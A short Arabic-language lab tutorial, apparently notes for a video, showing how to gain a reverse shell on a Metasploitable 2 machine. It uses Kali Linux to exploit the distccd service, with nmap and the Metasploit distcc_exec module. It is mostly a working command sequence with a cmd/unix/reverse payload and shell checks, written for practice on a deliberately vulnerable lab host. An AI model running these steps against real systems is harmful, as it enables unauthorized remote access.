
في هذا الفيديو، يتم عرض كيفية الحصول على شل عن بعد عبر Kali Linux باستخدام ثغرة في خدمة distccd على نظام Metasploitable 2.
nmap -sV -p 3632 192.168.56.102
✅ النتيجة ستكون كالتالي:
3632/tcp open distccd v1
👉 إذن distcc مفتوح ويمكن استغلاله.
msfconsole
use exploit/unix/misc/distcc_exec
show options
المعلمات المطلوبة:
الخيار القيمة RHOSTS Metasploitable IP RPORT 3632 PAYLOAD cmd/unix/reverse
set RHOSTS 192.168.56.102
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.56.101
LHOST — عنوان IP الخاص بتوزيعة Kali Linux
run
🎉 النتيجة
إذا تم بنجاح:
[*] Command shell session opened
نتحقق من الشل:
whoami
uname -a
id